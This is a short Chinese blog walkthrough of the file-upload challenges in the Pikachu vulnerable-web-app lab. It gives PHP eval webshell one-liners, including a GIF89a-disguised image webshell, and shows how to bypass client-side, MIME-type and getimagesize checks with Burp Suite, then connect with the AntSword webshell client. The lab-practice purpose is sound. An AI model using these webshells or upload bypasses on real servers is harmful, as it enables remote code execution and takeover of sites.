Vinson's Blog

记录生活中的点点滴滴

0%

Pikachu-Unsafe-Fileupload

Unsafe-Fileupload篇

1.client check

t1题目
题目要求只能上传图片
这里我们可以写好一句话木马更改后缀名为php

1
<? @eval($_POST['cmd']);?>

然后上传利用burpsuit抓包工具进行抓包修改
bp
放包查看页面回显,发现有一个文件路径
lj
使用中国蚁剑这个工具进行连接后门
yj
yj

2.MIME type

t2题目
第二题可以按照第一题同理但是题目名字是类型所以我们可以上传一个php文件然后利用burpsuit抓包工具进行修改文件类型(image/jpeg)然后利用蚁剑即可。

3.getimagesize

t3题目
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息[通过读取文件头来判断上传的文件是否为图片]
构造文件头图片马

1
2
GIF89a
<script language="php">eval($_POST['cmd']);</script>

上传一张图片
2
发现他是根据日期来生成文件夹
然后配合文件上传漏洞触发图片码